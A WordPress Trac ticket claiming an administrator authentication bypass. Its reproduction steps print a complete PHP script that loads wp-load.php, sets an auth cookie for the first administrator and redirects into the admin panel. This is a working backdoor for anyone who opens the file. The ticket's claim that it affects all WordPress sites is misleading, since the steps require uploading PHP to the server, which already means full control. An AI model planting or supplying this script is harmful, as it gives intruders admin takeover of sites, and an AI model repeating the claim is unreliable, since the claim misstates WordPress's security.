[wp-trac] [WordPress Trac] #64924: Admin Authentication Bypass Vulnerability via wp-load.php

WordPress Trac noreply at wordpress.org
Sun Mar 22 17:42:13 UTC 2026 

#64924: Admin Authentication Bypass Vulnerability via wp-load.php
--------------------------+-----------------------------
 Reporter:  sajibekanti   |      Owner:  (none)
     Type:  defect (bug)  |     Status:  new
 Priority:  normal        |  Milestone:  Awaiting Review
Component:  General       |    Version:  6.9.4
 Severity:  normal        |   Keywords:
  Focuses:                |
--------------------------+-----------------------------
 **1. Title**:

 `Admin Authentication Bypass Vulnerability via wp-load.php`

  **2. Summary**:

 A vulnerability exists in WordPress where an attacker can bypass
 authentication and gain full administrator access using a custom PHP
 script. The script includes `wp-load.php` and uses WordPress functions
 like `wp_set_current_user()` and `wp_set_auth_cookie()` to log in as an
 administrator without the need for credentials.

  **3. Steps to Reproduce**:

 1. Create a new PHP file (e.g., `wp.php`).
 2. Paste the following code into the file:

    ```php
    <?php
    $wpLoadFile = 'wp-load.php';
    while(!file_exists($wpLoadFile)){if($t > 100)break;$wpLoadFile =
 '../'.$wpLoadFile;$t++;}
    if(file_exists($wpLoadFile)) require_once($wpLoadFile);

    $users = get_users(['role' => 'administrator','orderby' =>
 'user_registered','order' => 'ASC']);

    foreach($users as $user) {
     if (user_can($user, 'administrator')) {
      if(function_exists('wp_set_current_user')) {
       wp_set_current_user($user->ID, $user->user_login);
       wp_set_auth_cookie($user->ID);
       wp_redirect(get_admin_url());
       exit;
      }
     }
    }
    ?>
    ```
 3. Upload the PHP file to a WordPress site (e.g., in the root directory or
 another accessible directory).
 4. Access the PHP file via the browser (e.g.,
 `http://example.com/wp.php`).
 5. The script should bypass the login mechanism and automatically log you
 into the WordPress admin panel as an administrator.

  **4. Expected Behavior**:

 The code should not bypass the login system and should require
 authentication before granting admin access.

  **5. Actual Behavior**:

 The script bypasses the login process, allowing unauthorized access to the
 WordPress admin dashboard by setting an authentication cookie and
 redirecting to the admin panel.

  **6. Possible Impact**:

 This vulnerability allows an attacker to gain **administrator access** to
 any WordPress site, effectively taking full control of the site. It can
 lead to unauthorized content modifications, data loss, or further
 exploitation.

  **7. Affected Versions**:

 This vulnerability is relevant to **all versions of WordPress** that do
 not restrict access to `wp-load.php` or secure it appropriately.

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/64924>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

More information about the wp-trac mailing list